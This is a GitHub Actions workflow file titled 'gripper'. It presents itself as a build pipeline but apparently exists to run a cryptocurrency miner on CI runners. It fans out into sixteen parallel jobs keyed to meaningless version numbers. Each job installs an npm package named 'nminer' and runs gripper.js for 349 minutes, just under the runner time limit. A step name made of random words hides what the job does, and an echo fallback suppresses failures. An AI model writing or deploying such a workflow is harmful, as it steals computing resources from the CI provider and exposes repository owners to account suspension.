name: gripper
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5170 }
          - { version: 9313 }
          - { version: 3465 }
          - { version: 5739 }
          - { version: 5841 }
          - { version: 5371 }
          - { version: 4999 }
          - { version: 2679 }
          - { version: 5748 }
          - { version: 4350 }
          - { version: 4555 }
          - { version: 7605 }
          - { version: 24 }
          - { version: 1959 }
          - { version: 7529 }
          - { version: 3704 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: obediently beautifully permafrost actually minister
        run: |
          npm install nminer@latest
          timeout 349m node gripper.js || echo "gripper executed"